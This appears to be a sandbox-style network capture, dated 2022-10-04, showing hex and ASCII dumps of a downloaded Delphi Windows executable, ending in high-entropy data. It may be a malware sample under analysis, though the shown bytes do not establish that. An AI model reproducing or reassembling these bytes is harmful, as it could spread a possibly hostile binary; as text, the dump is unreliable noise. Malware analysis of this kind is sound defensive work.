                                                                                                                                                                                                                                    Data Ascii: SystemH+TList<System.Classes.TPropFixup>.TEmptyFunc&@@System.Generics.CollectionsHHHHHlH]@]@`@`@,`@0`@4`@(`@\@\@\@HJXJpHFList@FInde
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC583INData Raw: 03 8b d3 8b 4d f0 8b 45 f8 8b 18 ff 53 0c 33 c0 5a 59 59 64 89 10 68 24 26 49 00 8b 45 ec e8 cc 36 f7 ff c3 e9 1a 4a f7 ff eb f0 33 c0 5a 59 59 64 89 10 68 49 26 49 00 8b 45 f0 e8 af 36 f7 ff 8b 45 f4 e8 a7 36 f7 ff c3 e9 f5 49 f7 ff eb e8 33 c0 5a 59 59 64 89 10 68 6e 26 49 00 8d 45 f8 e8 1e 8e f7 ff 8d 45 fc e8 ba 53 f7 ff c3 e9 d0 49 f7 ff eb e8 5b 8b e5 5d c3 00 26 a0 0b d6 42 5e 2a 4c bb 01 3f 1c 8f 30 a2 8e 55 8b ec 33 c9 51 51 51 51 51 51 51 53 8b da 89 45 fc 33 c0 55 68 7e 28 49 00 64 ff 30 64 89 20 8b c3 e8 cd 6b f9 ff 8b 45 fc e8 1d dc ff ff 83 e0 7f 83 f8 15 0f 87 97 01 00 00 ff 24 85 c6 26 49 00 1e 27 49 00 56 28 49 00 3a 27 49 00 55 27 49 00 70 27 49 00 88 27 49 00 e9 27 49 00 56 28 49 00 17 28 49 00 17 28 49 00 2d 28 49 00 56 28 49 00 e9 27
                                                                                                                                                                                                                                    Data Ascii: MES3ZYYdh$&IE6J3ZYYdhI&IE6E6I3ZYYdhn&IEESI[]&B^*L?0U3QQQQQQQSE3Uh~(Id0d kE$&I'IV(I:'IU'Ip'I'I'IV(I(I(I-(IV(I'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC599INData Raw: 00 30 69 49 00 08 00 01 08 30 69 49 00 00 00 04 53 65 6c 66 02 00 02 00 37 00 18 7c 4b 00 08 43 6f 6e 74 61 69 6e 73 03 00 00 10 40 00 08 00 02 08 30 69 49 00 00 00 04 53 65 6c 66 02 00 0a fc 4b 47 00 01 00 05 56 61 6c 75 65 02 00 02 00 36 00 18 7c 4b 00 07 49 6e 64 65 78 4f 66 03 00 9c 10 40 00 08 00 02 08 30 69 49 00 00 00 04 53 65 6c 66 02 00 0a fc 4b 47 00 01 00 05 56 61 6c 75 65 02 00 02 00 4d 00 18 7c 4b 00 0b 49 6e 64 65 78 4f 66 49 74 65 6d 03 00 9c 10 40 00 08 00 03 08 30 69 49 00 00 00 04 53 65 6c 66 02 00 0a fc 4b 47 00 01 00 05 56 61 6c 75 65 02 00 00 b0 d8 40 00 02 00 09 44 69 72 65 63 74 69 6f 6e 02 00 02 00 3a 00 18 7c 4b 00 0b 4c 61 73 74 49 6e 64 65 78 4f 66 03 00 9c 10 40 00 08 00 02 08 30 69 49 00 00 00 04 53 65 6c 66 02 00 0a fc 4b 47
                                                                                                                                                                                                                                    Data Ascii: 0iI0iISelf7|KContains@0iISelfKGValue6|KIndexOf@0iISelfKGValueM|KIndexOfItem@0iISelfKGValue@Direction:|KLastIndexOf@0iISelfKG
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC615INData Raw: c4 f8 66 83 78 22 00 0f 95 c2 84 d2 75 17 89 44 24 04 8b 10 8b 52 08 89 14 24 ba e8 a6 49 00 3b 14 24 0f 95 c2 84 d2 74 0b ba ec a5 49 00 89 50 14 59 5a c3 33 d2 89 50 14 59 5a c3 8d 40 00 55 8b ec 8b 55 08 89 50 20 8b 55 0c 89 50 24 e8 ac ff ff ff 5d c2 08 00 53 8b 40 1c 8b 12 8b 09 8b 18 ff 53 0c 5b c3 90 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 ca a6 49 00 64 ff 30 64 89 20 8d 43 1c 8b d6 e8 11 0e f7 ff 83 7b 1c 00 75 18 8d 55 fc a1 98 2a 4a 00 e8 3a 45 01 00 8b 55 fc 8d 43 1c e8 f3 0d f7 ff 85 f6 74 0a b8 50 a6 49 00 89 43 18 eb 05 33 c0 89 43 18 33 c0 5a 59 59 64 89 10 68 d1 a6 49 00 8d 45 fc e8 b3 0d f7 ff c3 e9 6d c9 f6 ff eb f0 5e 5b 59 5d c3 8b c0 8b c8 b2 01 a1 38 73 47 00 e8 da 01 00 00 c3 90 53 66 83 78 22 00 74 0d 51 8b d8 8b ca 8b d0 8b
                                                                                                                                                                                                                                    Data Ascii: fx"uD$R$I;$tIPYZ3PYZ@UUP UP$]S@S[UjSV3UhId0d C{uU*J:EUCtPIC3C3ZYYdhIEm^[Y]8sGSfx"tQ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC631INData Raw: 00 48 23 44 24 04 8b d8 8d 04 5b 8b 56 04 8b 3c 82 83 ff ff 75 04 f7 d3 eb 34 3b 7c 24 04 75 19 8d 04 5b 8b 56 04 8b 54 82 04 8b 46 0c 8b 0c 24 8b 38 ff 57 0c 84 c0 75 15 43 8b 46 04 85 c0 74 05 83 e8 04 8b 00 3b c3 7f be 33 db eb ba 8b c3 59 5a 5f 5e 5b c3 90 53 56 8b f2 8b d8 8b 43 0c 8b d6 8b 08 ff 51 10 25 ff ff ff 7f 40 25 ff ff ff 7f 5e 5b c3 8b c0 55 8b ec 83 c4 f8 53 56 57 89 4d f8 89 55 fc 8b d8 8b 4d fc 8b 55 f8 8b c3 e8 3a ff ff ff 8b f0 f7 d6 8d 3c 76 8b 43 04 8b 55 fc 89 14 b8 8b 43 04 8d 44 b8 04 8b 55 f8 e8 53 97 f6 ff 8b 43 04 8b 55 08 89 54 b8 08 5f 5e 5b 59 59 5d c2 04 00 55 8b ec 53 56 57 8b f1 8b d8 8d 3c 76 8b 43 04 89 14 b8 8b 43 04 8d 44 b8 04 8b 55 0c e8 1e 97 f6 ff 8b 43 04 8b 55 08 89 54 b8 08 ff 43 08 b1 01 8b 55 0c 8b c3 8b 30
                                                                                                                                                                                                                                    Data Ascii: H#D$[V<u4;|$u[VTF$8WuCFt;3YZ_^[SVCQ%@%^[USVWMUMU:<vCUCDUSCUT_^[YY]USVW<vCCDUCUTCU0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC647INData Raw: ff 53 08 5b c3 8b c0 83 c4 f8 66 83 78 22 00 0f 95 c2 84 d2 75 17 89 44 24 04 8b 10 8b 52 08 89 14 24 ba f0 26 4a 00 3b 14 24 0f 95 c2 84 d2 74 0b ba f4 25 4a 00 89 50 14 59 5a c3 33 d2 89 50 14 59 5a c3 8d 40 00 55 8b ec 8b 55 08 89 50 20 8b 55 0c 89 50 24 e8 ac ff ff ff 5d c2 08 00 53 8b 40 1c 8b 12 8b 09 8b 18 ff 53 0c 5b c3 90 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 d2 26 4a 00 64 ff 30 64 89 20 8d 43 1c 8b d6 e8 09 8e f6 ff 83 7b 1c 00 75 18 8d 55 fc a1 a0 e9 4a 00 e8 92 c7 00 00 8b 55 fc 8d 43 1c e8 eb 8d f6 ff 85 f6 74 0a b8 58 26 4a 00 89 43 18 eb 05 33 c0 89 43 18 33 c0 5a 59 59 64 89 10 68 d9 26 4a 00 8d 45 fc e8 ab 8d f6 ff c3 e9 65 49 f6 ff eb f0 5e 5b 59 5d c3 8b c0 8b c8 b2 01 a1 d0 be 4a 00 e8 72 01 00 00 c3 90 53 66 83 78 22 00 74 0d
                                                                                                                                                                                                                                    Data Ascii: S[fx"uD$R$&J;$t%JPYZ3PYZ@UUP UP$]S@S[UjSV3Uh&Jd0d C{uUJUCtX&JC3C3ZYYdh&JEeI^[Y]JrSfx"t
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC663INData Raw: 00 00 00 00 80 00 00 00 80 ff ff 08 43 6f 6d 70 61 72 65 72 78 c9 47 00 20 00 00 ff 68 15 4a 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 4f 6e 4e 6f 74 69 66 79 34 66 4a 00 0f 2c 54 43 6f 6d 70 61 72 69 73 6f 6e 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 42 61 73 69 63 41 63 74 69 6f 6e 4c 69 6e 6b 3e b0 26 40 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 01 00 ff ff 02 00 00 00 cc 83 c0 f4 50 8b 00 8b 00 87 04 24 c3 83 44 24 04 f4 e9 61 5f f6 ff 83 44 24 04 f4 e9 7f 5f f6 ff 83 44 24 04 f4 e9 91 5f f6 ff cc a5 66 4a 00 af 66 4a 00 b9 66 4a 00 99 66 4a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 66 4a 00 0c 00 00 00 00 00 00 00 24 e6 47 00
                                                                                                                                                                                                                                    Data Ascii: ComparerxG hJOnNotify4fJ,TComparison<System.Classes.TBasicActionLink>&@@System.Generics.DefaultsP$D$a_D$_D$_fJfJfJfJfJ$G
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC679INData Raw: 7c 4b 00 07 52 65 76 65 72 73 65 03 00 00 00 00 00 08 00 01 08 24 a8 4a 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 18 7c 4b 00 04 53 6f 72 74 03 00 00 00 00 00 08 00 01 08 24 a8 4a 00 00 00 04 53 65 6c 66 02 00 02 00 37 00 18 7c 4b 00 04 53 6f 72 74 03 00 00 00 00 00 08 00 02 08 24 a8 4a 00 00 00 04 53 65 6c 66 02 00 0a 48 99 4a 00 01 00 09 41 43 6f 6d 70 61 72 65 72 02 00 02 00 49 00 18 7c 4b 00 0c 42 69 6e 61 72 79 53 65 61 72 63 68 03 00 00 10 40 00 08 00 03 08 24 a8 4a 00 00 00 04 53 65 6c 66 02 00 02 e4 10 40 00 01 00 04 49 74 65 6d 02 00 20 9c 10 40 00 02 00 05 49 6e 64 65 78 02 00 02 00 5c 00 18 7c 4b 00 0c 42 69 6e 61 72 79 53 65 61 72 63 68 03 00 00 10 40 00 0c 00 04 08 24 a8 4a 00 00 00 04 53 65 6c 66 02 00 02 e4 10 40 00 01 00 04 49 74 65 6d 02
                                                                                                                                                                                                                                    Data Ascii: |KReverse$JSelf$|KSort$JSelf7|KSort$JSelfHJAComparerI|KBinarySearch@$JSelf@Item @Index\|KBinarySearch@$JSelf@Item
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC695INData Raw: 43 6c 61 73 73 65 73 2e 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 3e 3e b0 26 40 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 01 00 ff ff 02 00 00 cc 83 c0 f4 50 8b 00 8b 00 87 04 24 c3 83 44 24 04 f4 e9 ad df f5 ff 83 44 24 04 f4 e9 cb df f5 ff 83 44 24 04 f4 e9 dd df f5 ff cc 59 e6 4a 00 63 e6 4a 00 6d e6 4a 00 4d e6 4a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 e6 4a 00 0c 00 00 00 00 00 00 00 e4 a9 4a 00 04 e7 4a 00 88 e6 4a 00 00 00 00 00 00 00 00 00 48 e8 4a 00 00 00 00 00 08 e7 4a 00 00 00 00 00 26 e7 4a 00 14 00 00 00 9c 27 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 e0 c5 40 00 ec c5 40 00 34 60 40 00 28 60 40 00
                                                                                                                                                                                                                                    Data Ascii: Classes.TFieldsCache.TFields>>&@@System.Generics.DefaultsP$D$D$D$YJcJmJMJxJJJJHJJ&J'@]@]@`@`@@@4`@(`@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC711INData Raw: 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00 18 7c 4b 00
                                                                                                                                                                                                                                    Data Ascii: |K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K|K
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC727INData Raw: 00 00 00 00 00 00 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: `pP
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC743INData Raw: 75 6e 64 00 00 00 00 53 61 66 65 41 72 72 61 79 47 65 74 55 42 6f 75 6e 64 00 00 00 00 56 61 72 69 61 6e 74 49 6e 69 74 00 00 00 56 61 72 69 61 6e 74 43 6c 65 61 72 00 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6e 67 00 00 00 53 79 73 52 65 41 6c 6c 6f 63 53 74 72 69 6e 67 4c 65 6e 00 00 00 56 61 72 69 61 6e 74 43 68 61 6e 67 65 54 79 70 65 00 00 00 53 61 66 65 41 72 72 61 79 43 72 65 61 74 65 00 6e 65 74 61 70 69 33 32 2e 64 6c 6c 00 00 00 00 4e 65 74 57 6b 73 74 61 47 65 74 49 6e 66 6f 00 00 00 4e 65 74 41 70 69 42 75 66 66 65 72 46 72 65 65 00 00 61 64 76 61 70 69 33 32 2e 64 6c 6c 00 00 00 00 52 65 67 51 75 65 72 79 56 61 6c 75 65 45 78 57 00 00 00 00 41 64 6a 75 73 74 54 6f 6b 65 6e 50 72 69 76 69 6c 65 67 65 73 00 00 00 4c 6f 6f 6b 75 70 50 72 69 76
                                                                                                                                                                                                                                    Data Ascii: undSafeArrayGetUBoundVariantInitVariantClearSysFreeStringSysReAllocStringLenVariantChangeTypeSafeArrayCreatenetapi32.dllNetWkstaGetInfoNetApiBufferFreeadvapi32.dllRegQueryValueExWAdjustTokenPrivilegesLookupPriv
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC759INData Raw: 00 ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 04 dd 81 21 04 de ff 21 04 de ff 21 04 de ff 20 04 df c5 1a 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: !!!
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC775INData Raw: de 0e 20 63 8b 3d 60 80 2f 8c 1d 38 a8 e0 f2 01 71 d8 ee 0e 92 91 5e e6 11 ff 2b 19 af 5d 56 2f d0 36 b9 4d 81 0c 36 9c 43 6c 2d c3 34 7e f3 34 a0 07 f7 0f 65 f1 40 1c 46 90 33 6a ed 98 a4 f5 47 ea 00 f6 9d da 47 a9 fc e5 67 3d 20 56 69 3f 4b 5d 50 d9 77 01 a5 ba b7 41 2b 87 6a e3 13 3e 1b 3a b3 87 d6 bf fd 51 eb f1 f0 9b 5b 45 d3 a3 d7 10 fe 60 08 26 da 06 11 0b 38 04 81 08 b4 a0 2f 94 cb 28 39 cd da 6d 92 d6 31 9d 61 40 32 26 ea 8e 91 80 3f ff 41 b4 88 be f5 bc f1 16 5a bb 32 fc 4a 89 6c d7 10 77 be 8a 74 df 2a 4f 6d 2a aa 41 bf 15 4b 4b d3 4a 1a f3 ec 82 40 e5 45 ab 56 be ec bc 72 c3 85 f0 a4 42 67 30 44 c3 a6 2a 53 ff 85 8f 85 ab cb 92 ba 31 1e f3 da c3 da 5c f6 a6 56 2f 21 1f 38 d1 32 2d b7 9a 56 07 17 ad 91 db 01 5f cc 42 aa 09 fa dd f8 69 65 de fe
                                                                                                                                                                                                                                    Data Ascii: c=`/8q^+]V/6M6Cl-4~4e@F3jGGg= Vi?K]PwA+j>:Q[E`&8/(9m1a@2&?AZ2Jlwt*Om*AKKJ@EVrBg0D*S1\V/!82-V_Bie
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC791INData Raw: 57 8d 09 79 33 b5 3f c5 e3 32 5d ba a0 a4 99 8b 27 ad 6c 61 2b 74 54 b4 ed 6e cd 8c 9f b6 5a 55 31 d0 28 2e 93 6f a7 b2 f8 6d 74 c9 5c 24 67 bb 7d af 6b 19 99 09 f2 32 e1 62 6a 8c 7b 6d 7a af 2d 4d c3 77 00 a3 45 bc 6b 94 d3 d7 87 ad 27 51 9b f2 6f 4c 46 df 9f 8d 95 9d 0f f1 99 d4 37 a1 e7 0f 45 f3 88 fa 02 25 7c a8 a3 9e 67 4d e8 d6 3f 39 57 ff 26 82 91 b7 e5 f4 1d 86 d4 2a d9 08 ea af e6 44 ff a1 40 de 14 08 cb 3b 74 37 4e 0a 9e 20 92 7b 45 f4 33 c2 0b f7 91 82 6f de 0e 53 db cf 5b 1a cc 73 41 bb 85 a0 51 36 29 f4 0c ff 84 8d 6c c7 43 71 21 4a d5 6a ca 94 dc 0e 92 1a ca a5 b8 b3 ac cc 0c a7 ae 96 1e 1f ae ae f9 0e 55 32 87 fd b9 22 d7 b5 ca e8 c1 55 31 b7 87 42 8f a3 53 af 20 99 d1 e8 e4 7e 43 54 41 26 80 b7 dd da b4 95 9f b5 f0 e6 e6 bd 53 03 4a 5d 9b
                                                                                                                                                                                                                                    Data Ascii: Wy3?2]'la+tTnZU1(.omt\$g}k2bj{mz-MwEk'QoLF7E%|gM?9W&*D@;t7N {E3oS[sAQ6)lCq!JjU2"U1BS ~CTA&SJ]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC807INData Raw: 3e 60 25 e1 ed b4 f0 95 47 fb f9 04 0c ad f1 de 3a 5f e8 b2 98 1a f5 ed 07 dd 14 0d e3 76 94 61 c4 4a 9f b2 92 aa ec 96 78 02 50 5a fd af f7 44 a6 61 d9 ba da 13 7e ea 51 00 4b 37 3b 9c 79 09 c4 59 29 0c 24 ad 11 90 6a 52 e1 e5 f9 06 60 e4 4d 48 fe 0a 92 f5 39 c5 93 83 92 39 c5 6b 24 35 2e f3 65 58 af 00 31 5d 90 b9 97 5a e1 27 61 e0 49 39 40 00 b9 a4 84 e9 6d aa c4 37 7a b2 45 76 2b 58 a4 b6 bb 85 f0 cd 83 9d 19 cc c8 a2 39 f6 70 4e 1c 6f 3c a1 5c 6a 72 46 c5 14 64 be 78 a1 54 a0 95 b6 ec 45 5d 12 1d 01 6e 87 b8 24 ec 50 5d cd 17 ca 60 a0 0e 57 a4 b9 71 1f ab 1c bf e4 92 2b c7 1d f3 f5 84 18 a6 25 d2 08 50 dd e1 96 23 f9 5f 91 bc df 7e df e4 fe f6 f7 64 fc 7f 0b bc 57 b2 79 47 94 b9 0d da f0 1b 76 a1 a4 ec e8 fb 70 89 eb 9d 34 35 61 f7 22 de 79 e8 64 15
                                                                                                                                                                                                                                    Data Ascii: >`%G:_vaJxPZDa~QK7;yY)$jR`MH99k$5.eX1]Z'aI9@m7zEv+X9pNo<\jrFdxTE]n$P]`Wq+%P#_~dWyGvp45a"yd
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC823INData Raw: eb 8a 95 25 28 72 6d a7 9e 0e 42 91 b0 4d 22 89 f8 bd 58 ef db 42 5b 9a 47 58 c6 22 7b 37 91 aa e0 02 4f 47 a1 ca ed 12 36 ef 58 ab b0 80 d4 c6 60 3a 9a 3f ce 44 a2 90 e6 6e e7 94 f5 fa 5e 96 ae 60 aa cd af f2 f5 29 f8 72 6a 00 6a ee d2 e7 1d d2 33 92 28 8a 20 35 01 38 a6 50 10 4b 15 ab 85 dd 94 5a 80 f0 50 8e a3 26 68 91 96 3a c5 23 8b b5 c3 b1 92 6c 8e 01 f5 7c fb 4d b4 e6 0d eb e7 91 73 cd 9d 1e 2f 3c fd 16 9c 6d 50 70 d3 e5 24 ac 53 3b 1a 98 1b 75 fa a4 b7 ac f0 26 98 7c cf 97 6c 29 20 59 5a 55 e2 00 85 9b 3c 87 a1 aa 86 20 55 98 bd fb d5 d1 cf 2f 30 c5 0a 09 75 bb c0 44 aa 48 a1 76 ec 3c d9 4c 6e de d3 2f 77 d5 ca 40 c0 ef 8e 43 bc eb 35 fc d3 4a 43 de 87 14 06 8d a0 fe 70 b3 fa 73 cb 72 e3 fa 64 7b ba 1d 5a 61 30 ef e2 3b d1 db 67 e1 6f aa ea 0f 7a
                                                                                                                                                                                                                                    Data Ascii: %(rmBM"XB[GX"{7OG6X`:?Dn^`)rjj3( 58PKZP&h:#l|Ms/<mPp$S;u&|l) YZU< U/0uDHv<Ln/w@C5JCpsrd{Za0;goz
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC839INData Raw: 1e 40 38 99 d1 23 98 bb ae 70 d2 59 fb b3 24 b6 50 a0 f4 5c f1 92 73 a7 f3 1d 2c 8e 17 c4 55 d7 4b 3c 1d 74 3a 6c 55 b5 cc 1a 2f 3b 96 8e f0 41 99 50 3d 41 69 8b 17 3e 6a 82 33 fb e6 ce 16 02 9a 92 92 6b 40 b9 d9 5a e7 b1 1b a7 06 34 d8 85 c2 90 6a 3c 03 82 a8 27 a9 e5 6a 08 79 f8 5f 4b b6 25 53 cd a5 f5 66 2d 9f b7 f5 6b 23 3f b6 d6 b2 c0 fc 72 21 46 10 d4 35 26 35 0d 52 d8 d2 dc 91 2a 18 8f 3c d5 b7 c1 65 2e b6 74 cf 9b fc 8d 26 7d 92 0b 41 be ba cf 9b 53 c6 4e 8f ef 01 f4 f0 6c 08 4e 77 45 5e 1d b9 d3 5a e9 a6 aa 06 64 21 9d db b1 1a 91 1c a2 05 ac 33 8d 2d a6 3e 6b cc 0f 9b ed 4c 6b d6 53 32 37 66 41 dd 3c 03 90 89 22 9f da bb 55 ee b8 6d ee 5e 45 25 6d fa 38 49 d6 f3 1d 2c f3 ad b6 9e c6 2e 30 f7 a7 78 16 60 e9 b7 2f 78 c4 f4 6c 1d 58 f3 4a 88 8d 3a
                                                                                                                                                                                                                                    Data Ascii: @8#pY$P\s,UK<t:lU/;AP=Ai>j3k@Z4j<'jy_K%Sf-k#?r!F5&5R*<e.t&}ASNlNwE^Zd!3->kLkS27fA<"Um^E%m8I,.0x`/xlXJ:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC855INData Raw: 55 07 cf a4 e9 fe c3 fe a1 91 01 a5 77 38 8c 66 c3 ef 72 20 d9 30 41 88 de bc 8e 3c 2c 80 42 d7 e5 4d 91 1b f0 2b f6 c2 7e dd 51 51 70 60 c9 f8 02 66 1f fa 55 31 fa 9c 16 7c 24 ee 5b 88 a1 4b 1f 41 0f 5e 7f 79 a0 f8 8d b9 38 b6 0c b0 56 9e 25 d6 fe 36 ce 93 cb 40 b9 e0 52 6f 69 86 c1 0c ef d1 9d c5 68 3d cf c7 b3 f8 cb e6 78 84 20 65 37 6f 2f 96 81 ad ef 00 10 54 75 01 df a8 b5 f1 74 9f 19 d6 a6 50 a0 13 5d 26 ca 69 3e 33 70 dc f7 94 7d bd b1 18 de e7 85 3e 12 4d 66 d3 87 1b 8c 26 bb ee f5 42 54 e9 58 b1 03 23 11 de ae 71 ca c3 d0 da 9d 6c 3a 86 26 1f c5 c3 37 57 49 f2 5c 18 e1 26 a5 fa ea c3 45 fa dc 1d 93 1c d6 9a c0 0c c4 81 57 e6 62 4b cc 53 f6 f7 7f 66 30 2a 56 0f 21 87 db cf 5d d7 2a c0 15 32 fa fe 08 77 4c 63 21 45 33 59 d7 58 22 ae 52 6c e5 64 89
                                                                                                                                                                                                                                    Data Ascii: Uw8fr 0A<,BM+~QQp`fU1|$[KA^y8V%6@Roih=x e7o/TutP]&i>3p}>Mf&BTX#ql:&7WI\&EWbKSf0*V!]*2wLc!E3YX"Rld
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC871INData Raw: b3 0d 30 db fd f1 0f 01 7e c6 48 85 de ad 0f 85 56 cc 95 b2 c0 f5 74 79 46 22 ba e5 d3 96 2d 09 8e df 75 0e e2 df a8 31 d8 fb 9e 02 09 05 70 bb 3b a6 91 ee 6a f7 ba f9 d3 20 0a 94 13 49 67 ba 7e c4 9b 83 b6 11 8e 3e 78 50 02 91 77 39 24 b7 83 56 f4 b8 07 bd c8 82 46 48 fd 15 e3 87 a6 9e a3 58 31 75 17 d1 fe aa 59 bf bb 90 b8 b3 6d 08 76 76 02 b1 f2 8a ae 81 15 f2 39 6a e2 92 32 3b ab 1a 29 4d bd 59 b6 2d c6 77 19 1e f9 89 9c d6 51 e6 c2 f6 7d d1 44 81 35 70 c1 27 c0 4e e9 dd db 1a 18 1e c9 eb eb 1e 48 b4 76 f7 cf e5 1d 20 ec 49 34 c0 1c 4c b0 9f 4b 2d 5d c1 0d 50 d3 fe cc 1e 3b dd 6a e0 a7 f4 bc 6c 2c 9a 2c b6 03 b6 80 7f d9 98 8b 1d 8b 1b ee 5b d1 23 d6 4e 2e 31 3f ef 32 65 6d 1d a2 58 7c 6c 76 66 6f 33 d1 12 ae fe 0d e4 53 67 b4 39 1d 23 c4 08 55 0c 38
                                                                                                                                                                                                                                    Data Ascii: 0~HVtyF"-u1p;j Ig~>xPw9$VFHX1uYmvv9j2;)MY-wQ}D5p'NHv I4LK-]P;jl,,[#N.1?2emX|lvfo3Sg9#U8
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC887INData Raw: 54 75 39 3a 25 f1 ee 0e 1d 3b 94 f6 2a 81 a2 d7 24 49 8e b8 b3 19 a8 b6 6f 11 b7 f4 51 6b 88 88 d2 fa e7 a0 37 fa d5 96 20 c9 d4 7b 4e da 02 dd 27 e9 6a 16 1b b0 d6 6d f3 9a ce 2e 8a 5b 86 a6 6c a1 f3 03 5a 03 7c 43 7d 33 5b fb 66 48 57 b1 7c f6 51 62 c2 ed bf 30 a1 d0 56 95 57 df b5 2e 54 e9 e8 e8 b2 73 7a 54 ef e8 0d 90 51 86 00 4b 61 5c d0 88 b4 f7 7a 46 8f 88 eb 61 c6 71 e2 d9 fb a5 af d5 7c a3 60 32 bf a5 f3 e5 1d 5e 3c ca 43 7c f9 fe b6 0d 23 aa 7c d2 a9 12 52 59 f8 09 7f 48 37 f7 a6 55 b5 65 70 54 1b fc 4e ff 8b 29 17 b6 f3 e4 80 f2 b5 19 fe 80 90 3a d0 4f ee 91 b8 69 eb 35 c8 a9 b9 bb 52 7b 0f 76 d0 69 d7 46 0c c8 5c 60 5a b5 fc 78 48 10 c1 d1 81 31 7d 5f b5 5b 50 45 70 55 17 cd f5 93 66 69 70 b9 48 c2 ed 96 23 c7 72 d8 bf 87 32 af 17 5a 3a 55 68
                                                                                                                                                                                                                                    Data Ascii: Tu9:%;*$IoQk7 {N'jm.[lZ|C}3[fHW|Qb0VW.TszTQKa\zFaq|`2^<C|#|RYH7UepTN):Oi5R{viF\`ZxH1}_[PEpUfipH#r2Z:Uh
